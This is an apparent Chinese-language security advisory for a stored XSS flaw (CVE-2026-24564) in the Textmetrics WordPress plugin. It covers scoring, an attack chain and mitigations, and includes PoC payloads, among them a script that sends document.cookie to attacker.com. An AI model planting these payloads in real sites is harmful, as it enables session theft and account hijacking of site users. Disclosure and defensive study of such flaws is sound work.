CVE-2026-24564 WordPress Textmetrics插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-24564

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Israpil Textmetrics webtexttool (WordPress插件)

漏洞概述

CVE-2026-24564是WordPress Textmetrics插件中的一个存储型跨站脚本（Stored XSS）漏洞，CVSS评分4.3，属于中等严重程度。该漏洞由于插件对用户输入的脚本相关HTML标签处理不当，未能正确进行中和（sanitization）处理，导致攻击者可以在网页中注入恶意脚本代码。Textmetrics是一款用于SEO优化的WordPress插件，帮助用户改善网站文本的可读性和SEO效果。由于该插件在WordPress生态中广泛使用，漏洞影响范围涵盖从任意版本至3.6.5版本的所有安装。攻击者可以利用此漏洞在受害者的浏览器中执行任意JavaScript代码，从而窃取会话令牌、劫持用户账户或进行其他恶意操作。漏洞由Patchstack安全团队于2026年1月23日披露，建议用户立即更新到最新版本以修复此安全问题。

技术细节

该漏洞属于Basic XSS（基本跨站脚本）类型，具体表现为存储型XSS（Stored XSS）。攻击者通过在Textmetrics插件的输入字段中注入恶意HTML/JavaScript代码，由于插件未对用户输入进行充分的输出编码和过滤，恶意脚本会被永久存储在数据库中。当其他用户访问包含该恶意内容的页面时，浏览器会解析并执行这些脚本。攻击向量为网络远程攻击（AV:N），需要低权限认证（PR:L），无需用户交互（UI:N）。受影响组件为Textmetrics插件的webtexttool功能模块，漏洞允许攻击者执行代码注入操作。虽然CVSS评分显示机密性影响为低（C:L），完整性和可用性影响为无，但存储型XSS漏洞在实际攻击中可能造成严重后果，包括会话劫持、敏感信息泄露和网站被篡改。攻击者通常通过WordPress后台或插件提供的输入接口注入恶意代码，然后等待管理员或用户访问受污染页面触发漏洞。

攻击链分析

STEP 1

信息收集

攻击者识别目标WordPress网站并确认Textmetrics插件版本 <= 3.6.5，通过查看页面源代码或使用WordPress插件扫描工具获取版本信息

STEP 2

认证与访问

攻击者获取WordPress站点的低权限账户（如作者、编辑角色），或利用其他漏洞获取认证访问权限

STEP 3

注入恶意代码

攻击者在Textmetrics插件的输入字段（如文本分析输入框、SEO内容设置等）中注入包含恶意JavaScript的XSS payload，如<script>标签或事件处理器属性

STEP 4

数据持久化

恶意脚本代码随用户提交的内容被存储到WordPress数据库中，通常保存在post_meta或插件自定义表中

STEP 5

漏洞触发

当其他用户（管理员、编辑或访客）访问包含该恶意内容的页面时，浏览器解析HTML并执行存储的JavaScript代码

STEP 6

攻击完成

攻击者成功执行JavaScript代码，可窃取用户会话cookie、劫持账户、执行任意操作或进一步渗透目标系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2026-24564 PoC - Stored XSS in Textmetrics WordPress Plugin -->
<!-- This PoC demonstrates the XSS vulnerability in Textmetrics plugin <= 3.6.5 -->
<!-- Affected Component: Textmetrics webtexttool input field -->

<!-- Basic XSS Payload -->
<script>alert('XSS - CVE-2026-24564')</script>

<!-- More sophisticated payload for session hijacking -->
<script>
  // Steal cookies and send to attacker controlled endpoint
  var stolen_data = document.cookie;
  fetch('https://attacker.com/steal?data=' + encodeURIComponent(stolen_data));
</script>

<!-- Image tag XSS payload (bypasses some filters) -->
<img src=x onerror="alert('XSS Triggered')">

<!-- SVG XSS payload -->
<svg onload="alert('CVE-2026-24564 XSS')">

<!-- Event handler XSS payload -->
<body onload="alert('Stored XSS in Textmetrics')">

<!-- PoC Attack Steps:
1. Identify WordPress site with Textmetrics plugin <= 3.6.5
2. Navigate to Textmetrics plugin settings or content input area
3. Inject malicious XSS payload into any text field
4. Save/submit the content
5. When admin or other users view the page containing the injected content,
   the XSS payload will execute in their browser
6. Attacker can steal session cookies, perform actions as the victim,
   or redirect users to malicious sites
-->

影响范围

Textmetrics (webtexttool) 所有版本 <= 3.6.5

防御指南

临时缓解措施

临时缓解措施：在开发者发布修复版本之前，可采取以下措施降低风险：1) 临时禁用Textmetrics插件直至修复可用；2) 限制只有受信任的管理员才能使用该插件；3) 启用Web应用防火墙(WAF)规则检测和阻止XSS攻击尝试；4) 对所有用户角色实施严格的访问控制策略；5) 监控网站日志关注异常的JavaScript执行行为；6) 考虑使用HTTPOnly和Secure标志保护Cookie；7) 启用WordPress的自动更新功能以便在修复发布时及时应用。